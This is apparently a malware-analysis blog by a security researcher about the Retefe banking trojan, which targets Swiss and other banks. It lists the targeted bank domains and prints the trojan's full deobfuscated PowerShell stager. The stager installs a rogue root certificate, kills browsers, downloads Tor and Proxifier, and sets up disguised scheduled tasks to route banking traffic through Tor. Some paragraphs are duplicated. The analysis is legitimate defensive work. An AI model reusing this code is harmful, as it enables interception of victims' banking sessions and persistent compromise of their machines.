Following last two posts, this is a quick update as I have detected that some new Swiss banks have been added to the list of victims of Retefe (since last time I checked some weeks ago)
These are:
*valiant.ch;*
*wir.ch;
*bankthalwil.ch;
*piguetgalland.ch;
*triba.ch;
*inlinea.ch;
*bernerlandbank.ch;
*bancasempione.ch;
*bsibank.com;
*corneronline.ch;
*vermoegenszentrum.ch;
*gobanking.ch;
*slbucheggberg.ch;
*slfrutigen.ch;
*hypobank.ch;
*regiobank.ch;
*rbm.ch;
*hbl.ch;
*ersparniskasse.ch;
*ekr.ch;*
sparkasse-dielsdorf.ch;
*eki.ch;
*bankgantrisch.ch;
*bbobank.ch;
*alpharheintalbank.ch;
*aekbank.ch;*
*acrevis.ch
Also, the Cyber Criminals have changed the way the malicious payload is weaponized through a malicious 'docx'.. Instead os using a JS script, now they are using an executable EXE:
DISCLAIMER: This blog is a set of personal notes I have decided to make public. Please, ignore any typo or language error
Wednesday, November 16, 2016
Malicious email campaign mimicking Swiss Financial Institutions: Retefe again (III)
Angel Alonso-Parrizas
Monday, October 17, 2016
Malicious email campaign mimicking Swiss Financial Institutions: Retefe again (II)
A few days ago when I took a look to the latest Retefe campaign affecting Swiss financial Institutions, I did not have the time to take a deeper look to the malicious JS embedded in the .docx file. So in this post I'll explain a bit about it. Particularly, I'm interested in understanding how the Proxifier tool is setup with a custom profile to forward the traffic through Tor. This tool is something Cyber Criminals have introduced recently, as previously they used a proxy PAC file which is setup in the registry key "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL"
Retefe is not just affecting Swiss banks, but also other countries banks, like UK. So it might be that the custom proxy file is hardcoded into the malicious JS or dynamically this file is downloaded. So let's take a look to it.
(I have upload the malicious JS payload to VT )
The JS is obfuscated so I'm using Visual Studio to perform some debugging.
The first interesting thing I see are the Tor URLs defined bvq64y3wwg3zzguk.onion, v7yxqrahkza3ewuv.onion, cvxbceskbuvsic3i.onion, a7j7f3rqdvoe5bav.onion,
Also, there is the fake Comodo CA which it used to avoid the browser SSL warnings. This is base64 encoded.
There is a PowerShell script to simulate the "click" to accept the import of the CA certificate.
Then there is a command to import the certificate
"certutil -addstore -f -user \"ROOT\" \""
and some base64 encoded commands to kill the browser running:
"dGFza2tpbGwgL0YgL2ltIGlleHBsb3JlLmV4ZQ=="
taskkill /F /im iexplore.exe
"dGFza2tpbGwgL0YgL2ltIGZpcmVmb3guZXhl"
taskkill /F /im firefox.exe
"dGFza2tpbGwgL0YgL2ltIGNocm9tZS5leGU="
taskkill /F /im chrome.exe
So at this point the malicious certificate has been imported and all the browsers, after killking them, have the COMODO CA maliciuos certificate in their CA chain
Debugging deeper, in the end, a temporal file is created which contains a PowerShell script the interesting stuff
This is the code
Then there is a command to import the certificate
"certutil -addstore -f -user \"ROOT\" \""
and some base64 encoded commands to kill the browser running:
"dGFza2tpbGwgL0YgL2ltIGlleHBsb3JlLmV4ZQ=="
taskkill /F /im iexplore.exe
"dGFza2tpbGwgL0YgL2ltIGZpcmVmb3guZXhl"
taskkill /F /im firefox.exe
"dGFza2tpbGwgL0YgL2ltIGNocm9tZS5leGU="
taskkill /F /im chrome.exe
So at this point the malicious certificate has been imported and all the browsers, after killking them, have the COMODO CA maliciuos certificate in their CA chain
Debugging deeper, in the end, a temporal file is created which contains a PowerShell script the interesting stuff
This is the code
function Unzip { param([string]$zipfile, [string]$destination); $7zaExe = Join-Path $env:Temp '7za.exe'; if (-NOT (Test-Path $7zaExe)){ Try { (New-Object System.Net.WebClient).DownloadFile('https://chocolatey.org/7za.exe',$7zaExe); } Catch{} } if ($(Try { Test-Path $7zaExe.trim() } Catch { $false })){ Start-Process "$7zaExe" -ArgumentList "x -o`"$destination`" -y `"$zipfile`"" -Wait -NoNewWindow } else{ $shell = new-object -com shell.application; $zip = $shell.NameSpace($zipfile); foreach($item in $zip.items()) { $shell.Namespace($destination).copyhere($item); } } } function Base64ToFile { param([string]$file, [string]$string); $bytes=[System.Convert]::FromBase64String($string); #set-content -encoding byte $file -value $bytes; [IO.File]::WriteAllBytes($file, $bytes); } function AddTask { param([string]$name, [string]$cmd, [string]$params='',[int]$restart=0,[int]$delay=0); $ts=New-Object Microsoft.Win32.TaskScheduler.TaskService; $td=$ts.NewTask(); $td.RegistrationInfo.Description = 'Does something'; $td.Settings.DisallowStartIfOnBatteries = $False; $td.Settings.StopIfGoingOnBatteries = $False; $td.Settings.MultipleInstances = [Microsoft.Win32.TaskScheduler.TaskInstancesPolicy]::IgnoreNew; $LogonTrigger = New-Object Microsoft.Win32.TaskScheduler.LogonTrigger; $LogonTrigger.StartBoundary=[System.DateTime]::Now; $LogonTrigger.UserId=$env:username; $LogonTrigger.Delay=[System.TimeSpan]::FromSeconds($delay); $td.Triggers.Add($LogonTrigger); if($restart -eq 1){ $TimeTrigger = New-Object Microsoft.Win32.TaskScheduler.TimeTrigger; $TimeTrigger.StartBoundary=[System.DateTime]::Now; $TimeTrigger.Repetition.Interval=[System.TimeSpan]::FromMinutes(20); $TimeTrigger.Repetition.StopAtDurationEnd=$False; $td.Triggers.Add($TimeTrigger); } $ExecAction=New-Object Microsoft.Win32.TaskScheduler.ExecAction($cmd,$params); $td.Actions.Add($ExecAction); $task=$ts.RootFolder.RegisterTaskDefinition($name, $td); $task.Run(); } function InstallTP{ $File=$env:Temp+'\ts.zip'; $Dest=$env:Temp+'\ts'; (New-Object System.Net.WebClient).DownloadFile('http://download-codeplex.sec.s-msft.com/Download/Release?ProjectName=taskscheduler&DownloadId=1505290&FileTime=131142250937900000&Build=21031',$File); if ((Test-Path $Dest) -eq 1){rm -Force -Recurse $Dest;}md $Dest | Out-Null; Unzip $File $Dest; rm -Force $File; $TSAssembly=$Dest+'\v2.0\Microsoft.Win32.TaskScheduler.dll'; $loadLib = [System.Reflection.Assembly]::LoadFile($TSAssembly); $TFile=$env:Temp+'\t.zip'; $DestTP=$env:APPDATA+'\TP'; (New-Object System.Net.WebClient).DownloadFile('https://dist.torproject.org/torbrowser/6.0.4/tor-win32-0.2.8.6.zip',$TFile); if ((Test-Path $DestTP) -eq 1){rm -Force -Recurse $DestTP;}md $DestTP | Out-Null; Unzip $TFile $DestTP; rm -Force $TFile; $tor=$DestTP+'\Tor\tor.exe'; $tor=$tor.Replace('\','/'); $tor_cmd="`"javascript:close(new ActiveXObject('WScript.Shell').Run('$tor',0,false))`""; AddTask 'SkypeUpdateTask' 'mshta.exe' $tor_cmd; $PFile=$env:Temp+'\p1.zip'; $wc=new-object net.webclient; $purl='http://proxifier.com/distr/ProxifierPE.zip'; $wc.DownloadFile($purl,$PFile); Unzip $PFile $DestTP; $p_old=$DestTP+'\Proxifier PE\'; rm -Force $PFile; Rename-Item -path $p_old -newName 'p'; $p_fold=$DestTP+'\p\'; $p=$DestTP+'\p\Proxifier.exe'; $settings_file=$p_fold+'Settings.ini'; Base64ToFile $settings_file 'W1NldHRpbmdzXQ0KRGVmYXVsdE5ldFByb2ZpbGU9MTcxMTg3Njg4NQ0KTG9nTGV2ZWxTY3JlZW49Mg0KTG9nTGV2ZWxGaWxlPTANCkxvZ1BhdGg9DQpTeXNUcmF5SWNvbj0xDQpTeXNUcmF5SWNvblNob3dUcmFmZmljPTANClNob3dUcmFmZmljVHlwZT0wDQpUcmFmZmljUmVmcmVzaFNwZWVkPTENCkFjdGl2ZVByb2ZpbGU9RGVmYXVsdA0KUHJvZmlsZUF1dG9VcGRhdGU9MA0KUHJvZmlsZVVwZGF0ZVVybD0NClByb2ZpbGVVcGRhdGVVcmxUb0ZvbGRlcj0xDQpQcm9maWxlVXBkYXRlS2VlcExvZ2lucz0wDQpVcGRhdGVDaGVjaz0wDQpbV29ya3NwYWNlXQ0KQXBwbGljYXRpb25Mb29rPTIxNA0KUnVsZURsZ1dpZHRoPTczMg0KUnVsZURsZ0hlaWdodD00MzYNCltEZWZhdWx0XENvbnRyb2xCYXJWZXJzaW9uXQ0KTWFqb3I9OQ0KTWlub3I9MA0KW0RlZmF1bHRcTUZDVG9vbEJhclBhcmFtZXRlcnNdDQpUb29sdGlwcz0xDQpTaG9ydGN1dEtleXM9MQ0KTGFyZ2VJY29ucz0wDQpNZW51QW5pbWF0aW9uPTANClJlY2VudGx5VXNlZE1lbnVzPTENCk1lbnVTaGFkb3dzPTENClNob3dBbGxNZW51c0FmdGVyRGVsYXk9MQ0KQ29tbWFuZHNVc2FnZT1BQUFBQUFBQUFBQUENCltEZWZhdWx0XENvbW1hbmRNYW5hZ2VyXQ0KQ29tbWFuZHNXaXRob3V0SW1hZ2VzPUFBQUENCk1lbnVVc2VySW1hZ2VzPUFBQUENCltEZWZhdWx0XENvbnRyb2xCYXJzLVN1bW1hcnldDQpCYXJzPTANClNjcmVlbkNYPTE2ODANClNjcmVlbkNZPTk0NQ0KW0RlZmF1bHRcUGFuZS01OTM5M10NCklEPTANClJlY3RSZWNlbnRGbG9hdD1LQUFBQUFBQUtBQUFBQUFBT0dBQUFBQUFPR0FBQUFBQQ0KUmVjdFJlY2VudERvY2tlZD1BQUFBQUFBQUdKQkFBQUFBRUVEQUFBQUFKS0JBQUFBQQ0KUmVjZW50RnJhbWVBbGlnbm1lbnQ9NDA5Ng0KUmVjZW50Um93SW5kZXg9MA0KSXNGbG9hdGluZz0wDQpNUlVXaWR0aD0zMjc2Nw0KUGluU3RhdGU9MA0KW0RlZmF1bHRcQmFzZVBhbmUtNTkzOTNdDQpJc1Zpc2libGU9MQ0KW0RlZmF1bHRcUGFuZS0tMV0NCklEPS0xDQpSZWN0UmVjZW50RmxvYXQ9SVBBQUFBQUFJS0JBQUFBQUFNQkFBQUFBQUhDQUFBQUENClJlY3RSZWNlbnREb2NrZWQ9QUFBQUFBQUFPQ0FBQUFBQUVFREFBQUFBQ0FCQUFBQUENClJlY2VudEZyYW1lQWxpZ25tZW50PTQwOTYNClJlY2VudFJvd0luZGV4PTANCklzRmxvYXRpbmc9MA0KTVJVV2lkdGg9MzI3NjcNClBpblN0YXRlPTANCltEZWZhdWx0XEJhc2VQYW5lLS0xXQ0KSXNWaXNpYmxlPTENCltEZWZhdWx0XFBhbmUtMzEwXQ0KSUQ9MzEwDQpSZWN0UmVjZW50RmxvYXQ9SVBBQUFBQUFJS0JBQUFBQUFNQkFBQUFBQUhDQUFBQUENClJlY3RSZWNlbnREb2NrZWQ9RUFBQUFBQUFHRUFBQUFBQUFFREFBQUFBSU9BQUFBQUENClJlY2VudEZyYW1lQWxpZ25tZW50PTgxOTINClJlY2VudFJvd0luZGV4PTANCklzRmxvYXRpbmc9MA0KTVJVV2lkdGg9MzI3NjcNClBpblN0YXRlPTANCltEZWZhdWx0XEJhc2VQYW5lLTMxMF0NCklzVmlzaWJsZT0wDQpbRGVmYXVsdFxQYW5lLTEwMjJdDQpJRD0xMDIyDQpSZWN0UmVjZW50RmxvYXQ9SVBBQUFBQUFJS0JBQUFBQUFNQkFBQUFBQUhDQUFBQUENClJlY3RSZWNlbnREb2NrZWQ9RUFBQUFBQUFHRUFBQUFBQUFFREFBQUFBSU9BQUFBQUENClJlY2VudEZyYW1lQWxpZ25tZW50PTQwOTYNClJlY2VudFJvd0luZGV4PTANCklzRmxvYXRpbmc9MA0KTVJVV2lkdGg9MzI3NjcNClBpblN0YXRlPTANCltEZWZhdWx0XEJhc2VQYW5lLTEwMjJdDQpJc1Zpc2libGU9MA0KW0RlZmF1bHRcUGFuZS0xMDIzXQ0KSUQ9MTAyMw0KUmVjdFJlY2VudEZsb2F0PUlQQUFBQUFBSUtCQUFBQUFBTUJBQUFBQUFIQ0FBQUFBDQpSZWN0UmVjZW50RG9ja2VkPUVBQUFBQUFBR0VBQUFBQUFBRURBQUFBQUlPQUFBQUFBDQpSZWNlbnRGcmFtZUFsaWdubWVudD00MDk2DQpSZWNlbnRSb3dJbmRleD0wDQpJc0Zsb2F0aW5nPTANCk1SVVdpZHRoPTMyNzY3DQpQaW5TdGF0ZT0wDQpbRGVmYXVsdFxCYXNlUGFuZS0xMDIzXQ0KSXNWaXNpYmxlPTANCltEZWZhdWx0XERvY2tpbmdNYW5hZ2VyLTEyOF0NCkRvY2tpbmdQYW5lQW5kUGFuZURpdmlkZXJzPUFBQUFBQUFBQ0FBQUFBQUFBQUFBQUFBQUFBQUNBQUFBQkFBQUFBQUFQUFBQUFBQUFBQUFBQUFBQQUFBQUFBQUFDQUJBQUFBQUVFREFBQUFBR0FCQUFBQUFBQUFBQUFBQUJBQUFBQUFCRUFBQUFBQUFCQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFQUFBQUFBQUERBQUFBQUFBR0RCQUFBQUFPUERBQUFBQVBQREFBQUFBUFBQUENBQUFMQUFBREVFRkJHQ0dDR0ZHRUdBRkJHT0dGR0FBQUNBQUFBQkFBQUFBQUFJUEFBQUFBQUlLQkFBQUFBQU1CQUFBQUFBSENBQUFBQUFBQUFBQUFBT0NBQUFBQUFFRURBQUFBQUNBQkFBQUFBQUFBQUFBQUFBRUVCQUFHRkRBQUFBQUFBUFBPUFBQTEFERUFBUEdBQU9HQUFPR0FBRkdBQURHQUFFSEFBSkdBQVBHQUFPR0FBREhBQUJBQUFBQUFBR0RCQUFBQUFCQUFBQUFBQVBQUFBQUFBQUFBQUFBQUFBQUE9QUFBIQUVGQUFDSEFBQkdBQUdHQUFHR0FBSkdBQURHQUFCQUFBQUFBQU9QREFBQUFBQkFBQUFBQUFQUFBQUFBQUFBQUFBQUFBQUFBPUFBQS0FERkFBRUhBQUJHQUFFSEFBSkdBQURIQUFFSEFBSkdBQURHQUFESEFBQkFBQUFBQUFQUERBQUFBQUJBQUFBQUFBUFBQUFBQUFBQUFBQUFBQUEFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFBQUFBUFBQUFBQUFBHREJBQUFBQUJBQUFBQUFBUFBQUFBQUFBHREJBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQ0KW1N0YXR1c10NCkZpcnN0UnVuPTANClN5c1RyeUljb25NZXNzYWdlU2hvd249MQ0KW1dvcmtzcGFjZVxDb250cm9sQmFyVmVyc2lvbl0NCk1ham9yPTkNCk1pbm9yPTANCltXb3Jrc3BhY2VcTUZDVG9vbEJhclBhcmFtZXRlcnNdDQpUb29sdGlwcz0xDQpTaG9ydGN1dEtleXM9MQ0KTGFyZ2VJY29ucz0wDQpNZW51QW5pbWF0aW9uPTANClJlY2VudGx5VXNlZE1lbnVzPTENCk1lbnVTaGFkb3dzPTENClNob3dBbGxNZW51c0FmdGVyRGVsYXk9MQ0KQ29tbWFuZHNVc2FnZT1HRkFBQUFBQUVCQUFBRUJPQUFBQUJBQUFBQUFBTkFFQUFBQUFDQUFBQUFBQVBIQUlBQUFBQkFBQUFBQUFFQUJPQUFBQUJBQUFBQUFBT0JBSUFBQUFHQkFBQUFBQU9FQUlBQUFBREFBQUFBQUFQRkFJQUFBQUNBQUFBQUFBTEVBSUFBQUFCQUFBQUFBQU1BRUFBQUFBQkFBQUFBQUFPSEFJQUFBQUJBQUFBQUFBREFCT0FBQUFDQUFBQUFBQU5CQUlBQUFBQUJBQUFBQUFQREFJQUFBQUxBQUFBQUFBQUFFQUFBQUFDQUFBQUFBQUNDQk9BQUFBQ0FBQUFBQUFESUFJQUFBQURBQUFBQUFBTURBSUFBQUFFQUFBQUFBQUtFQUlBQUFBSUFBQUFBQUFNQkFJQUFBQUNBQUFBQUFBT0RBSUFBQUFCQUFBQUFBQQ0KW1dvcmtzcGFjZVxDb21tYW5kTWFuYWdlcl0NCkNvbW1hbmRzV2l0aG91dEltYWdlcz1BQUFBDQpNZW51VXNlckltYWdlcz1BQUFBDQpbV29ya3NwYWNlXENvbnRyb2xCYXJzLVN1bW1hcnldDQpCYXJzPTANClNjcmVlbkNYPTE2ODANClNjcmVlbkNZPTk0NQ0KW1dvcmtzcGFjZVxQYW5lLTU5MzkzXQ0KSUQ9MA0KUmVjdFJlY2VudEZsb2F0PUtBQUFBQUFBS0FBQUFBQUFPR0FBQUFBQU9HQUFBQUFBDQpSZWN0UmVjZW50RG9ja2VkPUFBQUFBQUFBR0pCQUFBQUFFRURBQUFBQUpLQkFBQUFBDQpSZWNlbnRGcmFtZUFsaWdubWVudD00MDk2DQpSZWNlbnRSb3dJbmRleD0wDQpJc0Zsb2F0aW5nPTANCk1SVVdpZHRoPTMyNzY3DQpQaW5TdGF0ZT0wDQpbV29ya3NwYWNlXEJhc2VQYW5lLTU5MzkzXQ0KSXNWaXNpYmxlPTENCltXb3Jrc3BhY2VcUGFuZS0tMV0NCklEPS0xDQpSZWN0UmVjZW50RmxvYXQ9SVBBQUFBQUFHTkJBQUFBQU1ERUFBQUFBUExDQUFBQUENClJlY3RSZWNlbnREb2NrZWQ9QUFBQUFBQUFPQ0FBQUFBQUVFREFBQUFBSEJCQUFBQUENClJlY2VudEZyYW1lQWxpZ25tZW50PTQwOTYNClJlY2VudFJvd0luZGV4PTANCklzRmxvYXRpbmc9MA0KTVJVV2lkdGg9MzI3NjcNClBpblN0YXRlPTANCltXb3Jrc3BhY2VcQmFzZVBhbmUtLTFdDQpJc1Zpc2libGU9MQ0KW1dvcmtzcGFjZVxQYW5lLTMxMF0NCklEPTMxMA0KUmVjdFJlY2VudEZsb2F0PUNBQkFBQUFBSUJCQUFBQUFLTUJBQUFBQUFPQkFBQUFBDQpSZWN0UmVjZW50RG9ja2VkPUVBQUFBQUFBR0VBQUFBQUFBRURBQUFBQU5QQUFBQUFBDQpSZWNlbnRGcmFtZUFsaWdubWVudD04MTkyDQpSZWNlbnRSb3dJbmRleD0wDQpJc0Zsb2F0aW5nPTANCk1SVVdpZHRoPTMyNzY3DQpQaW5TdGF0ZT0wDQpbV29ya3NwYWNlXEJhc2VQYW5lLTMxMF0NCklzVmlzaWJsZT0wDQpbV29ya3NwYWNlXFBhbmUtMTAyMl0NCklEPTEwMjINClJlY3RSZWNlbnRGbG9hdD1DQUJBQUFBQUlCQkFBQUFBS01CQUFBQUFBT0JBQUFBQQ0KUmVjdFJlY2VudERvY2tlZD1FQUFBQUFBQUdFQUFBQUFBQUVEQUFBQUFOUEFBQUFBQQ0KUmVjZW50RnJhbWVBbGlnbm1lbnQ9ODE5Mg0KUmVjZW50Um93SW5kZXg9MA0KSXNGbG9hdGluZz0wDQpNUlVXaWR0aD0zMjc2Nw0KUGluU3RhdGU9MA0KW1dvcmtzcGFjZVxCYXNlUGFuZS0xMDIyXQ0KSXNWaXNpYmxlPTANCltXb3Jrc3BhY2VcUGFuZS0xMDIzXQ0KSUQ9MTAyMw0KUmVjdFJlY2VudEZsb2F0PUNBQkFBQUFBSUJCQUFBQUFLTUJBQUFBQUFPQkFBQUFBDQpSZWN0UmVjZW50RG9ja2VkPUVBQUFBQUFBR0VBQUFBQUFBRURBQUFBQU5QQUFBQUFBDQpSZWNlbnRGcmFtZUFsaWdubWVudD04MTkyDQpSZWNlbnRSb3dJbmRleD0wDQpJc0Zsb2F0aW5nPTANCk1SVVdpZHRoPTMyNzY3DQpQaW5TdGF0ZT0wDQpbV29ya3NwYWNlXEJhc2VQYW5lLTEwMjNdDQpJc1Zpc2libGU9MA0KW1dvcmtzcGFjZVxEb2NraW5nTWFuYWdlci0xMjhdDQpEb2NraW5nUGFuZUFuZFBhbmVEaXZpZGVycz1BQUFBQUFBQUNBQUFBQUFBQUFBQUFBQUFBQUFDQUFBQUJBQUFBQUFBUFBQUFBQUFBQUFBQUFBQUEFBQUFBQUFBSEJCQUFBQUFFRURBQUFBQUxCQkFBQUFBQUFBQUFBQUFCQUFBQUFBQkVBQUFBQUFBQkFBQUFBQUFHSk9QUFBQUElGQUFBQUFBUFBQUFBQUFBEQUFBQUFBQUdEQkFBQUFBT1BEQUFBQUFQUERBQUFBQVBQUFBDQUFBTEFBQURFRUZCR0NHQ0dGR0VHQUZCR09HRkdBQUFDQUFBQUJBQUFBQUFBSVBBQUFBQUFHTkJBQUFBQU1ERUFBQUFBUExDQUFBQUFBQUFBQUFBQU9DQUFBQUFBRUVEQUFBQUFIQkJBQUFBQUFBQUFBQUFBQUVFQkFBR0ZEQUFBQUFBQVBQT1BQUExBREVBQVBHQUFPR0FBT0dBQUZHQUFER0FBRUhBQUpHQUFQR0FBT0dBQURIQUFCQUFBQUFBQUdEQkFBQUFBQkFBQUFBQUFQUFBQUFBQUFBQUFBQUFBQUFBPUFBQSEFFRkFBQ0hBQUJHQUFHR0FBR0dBQUpHQUFER0FBQkFBQUFBQUFPUERBQUFBQUJBQUFBQUFBUFBQUFBQUFBQUFBQUFBQUFBQT1BQUEtBREZBQUVIQUFCR0FBRUhBQUpHQUFESEFBRUhBQUpHQUFER0FBREhBQUJBQUFBQUFBUFBEQUFBQUFCQUFBQUFBQVBQUFBQUFBQUFBQUFBQUFBBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFCQUFBQUFBQVBQUFBQUFBQR0RCQUFBQUFCQUFBQUFBQVBQUFBQUFBQR0RCQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUENCltXb3Jrc3BhY2VcV2luZG93UGxhY2VtZW50XQ0KTWFpbldpbmRvd1JlY3Q9QVBBQUFBQUFLSUJBQUFBQUVFRUFBQUFBSkZEQUFBQUENCkZsYWdzPTANClNob3dDbWQ9MQ0KW0xpY2Vuc2VdDQpPd25lcj0yVENLWC1UWVFITC1ORk4zMy0zWUVEWS1RVzY1RA0KS2V5PTJUQ0tYLVRZUUhMLU5GTjMzLTNZRURZLVFXNjVEDQo='; $p_prof=$p_fold+'Profiles\'; md $p_prof | Out-Null; $def_file=$p_prof+'Default.ppx'; Base64ToFile $def_file 'PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9InllcyI/Pg0KPFByb3hpZmllclByb2ZpbGUgdmVyc2lvbj0iMTAxIiBwbGF0Zm9ybT0iV2luZG93cyIgcHJvZHVjdF9pZD0iMSIgcHJvZHVjdF9taW52ZXI9IjMxMCI+DQogIDxPcHRpb25zPg0KICAgIDxSZXNvbHZlPg0KICAgICAgPEF1dG9Nb2RlRGV0ZWN0aW9uIGVuYWJsZWQ9ImZhbHNlIiAvPg0KICAgICAgPFZpYVByb3h5IGVuYWJsZWQ9InRydWUiPg0KICAgICAgICA8VHJ5TG9jYWxEbnNGaXJzdCBlbmFibGVkPSJmYWxzZSIgLz4NCiAgICAgIDwvVmlhUHJveHk+DQogICAgICA8RXhjbHVzaW9uTGlzdD4lQ29tcHV0ZXJOYW1lJTsgbG9jYWxob3N0OyAqLmxvY2FsPC9FeGNsdXNpb25MaXN0Pg0KICAgIDwvUmVzb2x2ZT4NCiAgICA8UHJveGlmaWNhdGlvblBvcnRhYmxlRW5naW5lIHN1YnN5c3RlbT0iMzIiPg0KICAgICAgPExvY2F0aW9uPkJhc2VQcm92aWRlcjwvTG9jYXRpb24+DQogICAgICA8VHlwZSBob3RwYXRjaD0idHJ1ZSI+UHJvbG9ndWU8L1R5cGU+DQogICAgPC9Qcm94aWZpY2F0aW9uUG9ydGFibGVFbmdpbmU+DQogICAgPFByb3hpZmljYXRpb25Qb3J0YWJsZUVuZ2luZSBzdWJzeXN0ZW09IjY0Ij4NCiAgICAgIDxMb2NhdGlvbj5CYXNlUHJvdmlkZXI8L0xvY2F0aW9uPg0KICAgICAgPFR5cGUgaG90cGF0Y2g9ImZhbHNlIj5Qcm9sb2d1ZTwvVHlwZT4NCiAgICA8L1Byb3hpZmljYXRpb25Qb3J0YWJsZUVuZ2luZT4NCiAgICA8RW5jcnlwdGlvbiBtb2RlPSJiYXNpYyIgLz4NCiAgICA8SHR0cFByb3hpZXNTdXBwb3J0IGVuYWJsZWQ9ImZhbHNlIiAvPg0KICAgIDxIYW5kbGVEaXJlY3RDb25uZWN0aW9ucyBlbmFibGVkPSJmYWxzZSIgLz4NCiAgICA8Q29ubmVjdGlvbkxvb3BEZXRlY3Rpb24gZW5hYmxlZD0idHJ1ZSIgLz4NCiAgICA8UHJvY2Vzc1NlcnZpY2VzIGVuYWJsZWQ9ImZhbHNlIiAvPg0KICAgIDxQcm9jZXNzT3RoZXJVc2VycyBlbmFibGVkPSJmYWxzZSIgLz4NCiAgPC9PcHRpb25zPg0KICA8UHJveHlMaXN0Pg0KICAgIDxQcm94eSBpZD0iMTAwIiB0eXBlPSJTT0NLUzUiPg0KICAgICAgPEFkZHJlc3M+MTI3LjAuMC4xPC9BZGRyZXNzPg0KICAgICAgPFBvcnQ+OTA1MDwvUG9ydD4NCiAgICAgIDxPcHRpb25zPjQ4PC9PcHRpb25zPg0KICAgIDwvUHJveHk+DQogIDwvUHJveHlMaXN0Pg0KICA8Q2hhaW5MaXN0IC8+DQogIDxSdWxlTGlzdD4NCiAgICA8UnVsZSBlbmFibGVkPSJ0cnVlIj4NCiAgICAgIDxOYW1lPkxvY2FsaG9zdDwvTmFtZT4NCiAgICAgIDxUYXJnZXRzPmxvY2FsaG9zdDsgMTI3LjAuMC4xOyAlQ29tcHV0ZXJOYW1lJTsgYXBpLmlwaWZ5Lm9yZzwvVGFyZ2V0cz4NCiAgICAgIDxBY3Rpb24gdHlwZT0iRGlyZWN0IiAvPg0KICAgIDwvUnVsZT4NCiAgICA8UnVsZSBlbmFibGVkPSJ0cnVlIj4NCiAgICAgIDxOYW1lPnNvZnQ8L05hbWU+DQogICAgICA8QXBwbGljYXRpb25zPmZpcmVmb3guZXhlO2lleHBsb3JlLmV4ZTtjaHJvbWUuZXhlPC9BcHBsaWNhdGlvbnM+DQogICAgICA8VGFyZ2V0cz4qcG9zdGZpbmFuY2UuY2g7Y3MuZGlyZWN0bmV0LmNvbTtlYi5ha2IuY2g7Ki51YnMuY29tO3RiLnJhaWZmZWlzZW5kaXJlY3QuY2g7Ki5ia2IuY2g7Ki5sdWtiLmNoOyouemtiLmNoOyoub25iYS5jaDtlLWJhbmtpbmcuZ2tiLmNoOyouYmVrYi5jaDt3d3dzZWMuZWJhbmtpbmcuenVnZXJrYi5jaDtuZXRiYW5raW5nLmJjZ2UuY2g7Ki5yYWlmZmVpc2VuLmNoOyouY3JlZGl0LXN1aXNzZS5jb207Ki5iYW5rYXVzdHJpYS5hdDsqLmJhd2FncHNrLmNvbTsqLnJhaWZmZWlzZW4uYXQ7Ki5zdGF0aWMtdWJzLmNvbTsqLmJhd2FnLmNvbTsqLmNsaWVudGlzLmNoO2NsaWVudGlzLmNoOypiY3ZzLmNoOypjaWMuY2g7d3d3LmJhbmtpbmcuY28uYXQ7Km9iZXJiYW5rLmF0O3d3dy5vYmVyYmFuay1iYW5raW5nLmF0OypiYWxvaXNlLmNoOyoudWtiLmNoO3Vya2IuY2g7Ki51cmtiLmNoOyouZWVrLmNoOypzemtiLmNoOypzaGtiLmNoOypnbGtiLmNoOypua2IuY2g7Km93a2IuY2g7KmNhc2guY2g7KmJjZi5jaDsqLmVhc3liYW5rLmF0O2ViYW5raW5nLnJhaWZmZWlzZW4uY2g7Ki5vbmlvbjsqYmN2LmNoOypqdWxpdXNiYWVyLmNvbTsqYWJzLmNoOypiY24uY2g7KmJsa2IuY2g7KmJjai5jaDsqenVlcmNoZXJsYW5kYmFuay5jaDsqdmFsaWFudC5jaDsqd2lyLmNoPC9UYXJnZXRzPg0KICAgICAgPEFjdGlvbiB0eXBlPSJQcm94eSI+MTAwPC9BY3Rpb24+DQogICAgPC9SdWxlPg0KICAgIDxSdWxlIGVuYWJsZWQ9InRydWUiPg0KICAgICAgPE5hbWU+RGVmYXVsdDwvTmFtZT4NCiAgICAgIDxBY3Rpb24gdHlwZT0iRGlyZWN0IiAvPg0KICAgIDwvUnVsZT4NCiAgPC9SdWxlTGlzdD4NCjwvUHJveGlmaWVyUHJvZmlsZT4='; AddTask 'ChromeUpdate' $p '' 1; } InstallTP
In the beginning, there is a function 'unzip' in charge of downloading an application from URL https://chocolatey.org/7za.exe to unzip compressed files.
Then, the function 'Base64ToFile' does a base64 decode of a string and stores the output in a file
But the key function, is the last one, InstallTP, which does several things:
Then, the function 'Base64ToFile' does a base64 decode of a string and stores the output in a file
But the key function, is the last one, InstallTP, which does several things:
- Pulls a file from http://download-codeplex.sec.s-msft.com/Download/Release?ProjectName=taskscheduler&DownloadId=1505290&FileTime=131142250937900000&Build=21031 Which permits to run the malicious process automatically as a task
- Pulls the Tor client from https://dist.torproject.org/torbrowser/6.0.4/tor-win32-0.2.8.6.zip to forward the traffic through Tor
- Pulls the Proxifier application from http://proxifier.com/distr/ProxifierPE.zip
- Configures the Settings.ini for the Proxyfier
- And finally, it is the interesting stuff, the Proxifier profile, where I can see all the banks for which the traffic is sent through Tor
